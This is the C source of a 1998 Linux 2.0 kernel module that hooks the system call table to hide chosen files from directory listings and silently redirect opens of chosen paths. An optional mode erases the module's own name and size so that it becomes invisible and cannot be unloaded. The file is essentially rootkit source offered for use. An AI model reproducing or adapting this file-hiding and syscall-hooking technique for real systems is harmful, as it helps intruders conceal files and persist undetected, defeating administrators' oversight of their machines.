/*
   Advanced file hide & redirect module for Linux 2.0.xx / i386 
   ------------------------------------------------------------
      (C) 1998 Michal Zalewski <lcamtuf@boss.staszic.waw.pl>
   *** Compilation: gcc -O3 -fomit-frame-pointer -c afhrm.c ***
             -- See config.h for detailed manual. --
*/

#define MODULE
#define __KERNEL__

#include <linux/module.h>
#include <linux/kernel.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <asm/fcntl.h>
#include <errno.h>
#include <dirent.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <statbuf.h>
#include "string-i386.h"
#include "broken-glibc.h"
#include <linux/fs.h>

/* Hope that's free? */
#define O_NOCHG     0x1000000
#define O_ACCNOCHG  0x2000000
#define O_STRICT    0x4000000

#define M_MAIN      0x0ffffff
#define M_MINOR     M_MAIN ^ O_ACCMODE

struct red {		// Redirections database entry.
  const char *src,*dst;
  const int flags,new_flags;
};

struct red redir_table[]={

// Include user-specific choices :-)
#include "config.h"

};

#define REDIRS sizeof(redir_table)/sizeof(struct red)

struct dat {		// Inode database entry.
  long ino,dev;
  int valid;
};

int as_today;           // internal counter.

struct dat polozenie[REDIRS];	// Inodes database.
struct stat buf;		// Stat buffer.

extern void* sys_call_table[];

// Old system calls handlers (for module removal).
int (*stary_open)(const char *pathname, int flags, mode_t mode);
int (*stary_getdents)(unsigned int fd, struct dirent *dirp, unsigned int count);


// Ugly low-level hack - OH, HOW WE NEED IT :)))
int mystat(const char* arg1,struct stat* arg2,char space) {
  unsigned long m1,m2;
  long __res;
  char* a1;
  struct stat* a2;
  if (!space) {
    // If needed, duplicate 1st argument to user space...
    m1=current->mm->brk;
    mybrk((void*)(m1+strlen(arg1)+1));
    a1=(char*)(m1+2);
    memcpy_tofs(a1,arg1,strlen(arg1)+1);
  } else a1=(char*)arg1;
  // Allocate space for 2nd argument...
  m2=current->mm->brk;
  mybrk((void*)(m2+sizeof(struct stat)));
  a2=(struct stat*)(m2+2);
  // Call stat(...)
  __asm__ volatile ("int $0x80"
    : "=a" (__res)
    : "0" (__NR_stat),"b" ((long)(a1)),"c" ((long)(a2))
  );
  // Copy 2nd argument back...
  memcpy_fromfs(arg2,a2,sizeof(struct stat));
  // Free memory.
  if (!space) mybrk(m1); else mybrk(m2);
  return __res;
}

// Syscall hack - another one...
int mybrk(void* end) {
  long __res;
  __asm__ volatile ("int $0x80"
    : "=a" (__res)
    : "0" (__NR_brk),"b" ((long)(end))
  );
  return __res;
}

// New open(...) handler.
extern int nowy_open(const char *pathname, int flags, mode_t mode) {
  int i=0,n,w;
  char zmieniony=0,*a1;
  struct stat buf;
  unsigned long m1,m2;
  if (++as_today>INTERV) {
    as_today=0;
    collect();
  }
  if (!mystat(pathname,&buf,1)) for (i=0;i<REDIRS && !zmieniony;i++) if (polozenie[i].valid
    && (long)buf.st_dev==polozenie[i].dev && (long)*((char*)&buf.st_dev+4)==polozenie[i].ino) {
    if (redir_table[i].flags & O_STRICT) n=redir_table[i].flags & O_ACCMODE; else n=0;
    switch(flags) {
      case O_RDONLY:
        if ((redir_table[i].flags & O_WRONLY) || (n & O_RDWR)) n=1;
        break;
      case O_WRONLY:
        if ((redir_table[i].flags & O_RDONLY) || (n & O_RDWR)) n=1;
        break;
      default:
        if (n && (n & (O_RDONLY|O_WRONLY))) n=1;
        n=0;
    }
#ifdef DEBUG
    printk("AFHRM_DEBUG: open %s (D:0x%x I:0x%x) ",redir_table[i].src, buf.st_dev, buf.st_ino);
    printk("[%s] of: 0x%x cf: 0x%x nf: ",redir_table[i].dst, mode,redir_table[i].flags);
    printk("0x%x rd: %d.\n", redir_table[i].new_flags, n==0);
#endif
    if (!n && ((redir_table[i].flags & M_MINOR) & flags == redir_table[i].flags & M_MINOR))
      if (redir_table[i].dst) {
        flags=(((redir_table[i].new_flags & O_NOCHG) > 0)*flags) |
	      (((redir_table[i].new_flags & O_ACCNOCHG) > 0)*(flags & O_ACCMODE)) |
	      (redir_table[i].new_flags & M_MAIN);
	/* User space trick */
        m1=current->mm->brk;
        mybrk((void*)(m1+strlen(redir_table[i].dst)+1));
        a1=(char*)(m1+2);
        memcpy_tofs(a1,redir_table[i].dst,strlen(redir_table[i].dst)+1);
	pathname=a1;
        zmieniony=1;
      } else return -ERR;
  }
  i=stary_open(pathname,flags,mode);
  if (zmieniony) mybrk((void*)m1);
  return i;
}

// New getdents(...) handler.
int nowy_getdents(unsigned int fd, struct dirent *dirp, unsigned int count) {
  int ret,n,t,i,dev;
  struct dirent *d2,*d3;
  ret=stary_getdents(fd,dirp,count);
  dev = (long)current->files->fd[fd]->f_inode->i_dev;
  if (ret>0) {
    d2=(struct dirent*)kmalloc(ret);
    memcpy_fromfs(d2,dirp,ret);
    d3=d2;
    t=ret;
    while (t>0) {
      n=d3->d_reclen;
      t-=n;
      for (i=0;i<REDIRS;i++)
        if (polozenie[i].valid && /* dev == polozenie[i].dev && */ /* BROKEN! */
	    d3->d_ino==polozenie[i].ino && redir_table[i].dst == NULL) {
#ifdef DEBUG
          printk("AFHRM_DEBUG: getdents %s [D: 0x%x I: 0x%x] r: 0x%x t: 0x%x\n",
	         redir_table[i].src,dev,d3->d_ino,ret,t);
#endif
          if (t!=0) memmove(d3,(char*)d3+d3->d_reclen,t); else d3->d_off=1024;
          ret-=n;
        }
      if (!d3->d_reclen) { ret-=t;t=0; }
      if (t) d3=(struct dirent*)((char*)d3+d3->d_reclen);
    }
    memcpy_tofs(dirp,d2,ret);
    kfree(d2);
  }
  return ret;
}

// Inode database rebuild procedure.
int collect() {
  int x=0,i=0,err;
#ifdef DEBUG
  printk("AFHRM_DEBUG: Automatic inode database rebuild started.\n",INTERV);
#endif
  for (;i<REDIRS;i++)
    if (!(err=mystat(redir_table[i].src,&buf,0))) {
      polozenie[i].valid=1;
      polozenie[i].dev=buf.st_dev;
      polozenie[i].ino=(long)*((char*)&buf.st_dev+4);
#ifdef DEBUG
  printk("AFHRM_DEBUG: #%d file %s [D: 0x%x I: 0x%x].\n",x,redir_table[i].src,
         buf.st_dev,buf.st_ino);
#endif
      x++;
    } else {
      polozenie[i].valid=0;
#ifdef DEBUG
     printk("AFHRM_DEBUG: file: %s missed [err %d].\n",redir_table[i].src,-err);
  }
  if (x!=REDIRS) {
    printk("AFHRM_DEBUG: %d inode(s) not found, skipped.\n",REDIRS-x);
#endif
  }
  return x;
}

// ********
// MAINS :)
// ********


// Module startup.
int init_module(void) {
  register struct module *mp asm("%ebp");
  int x;
#ifdef HIDDEN
  *(char*)(mp->name)=0;
  mp->size=0;
  mp->ref=0;
#endif
#ifdef VERBOSE
  printk("AFHRM_INIT: Version " VERSION " starting.\n");
#ifdef HIDDEN
  register_symtab(0);
  printk("AFHRM_INIT: Running in invisible mode - can't be removed.\n");
#endif
  printk("AFHRM_INIT: inode database rebuild interval: %d calls.\n",INTERV);
#endif
  x=collect();
  stary_open=sys_call_table[SYS_open];
  stary_getdents=sys_call_table[SYS_getdents];
#ifdef VERBOSE
  printk("AFHRM_INIT: Old SYS_open=0x%x, new SYS_open=0x%x.\n",(int)stary_open,(int)nowy_open);
  printk("AFHRM_INIT: Old SYS_getdents=0x%x, new SYS_getdents=0x%x.\n",(int)stary_getdents,
         (int)nowy_getdents);
#endif
  sys_call_table[SYS_open]=nowy_open;
  sys_call_table[SYS_getdents]=nowy_getdents;
#ifdef VERBOSE
  printk("AFHRM_INIT: %d of %d redirections loaded. Init OK.\n",x,REDIRS);
#endif
  return 0;
}


// Module shutdown...
void cleanup_module(void) {
#ifdef VERBOSE
  printk("AFHRM_INIT: Version " VERSION " shutting down.\n");
#endif
  sys_call_table[SYS_open]=stary_open;
  sys_call_table[SYS_getdents]=stary_getdents;
#ifdef VERBOSE
  printk("AFHRM_INIT: SYS_open=0x%x, SYS_getdents=0x%x. Shutdown OK.\n",(int)stary_open,
         (int)stary_getdents);
#endif
}
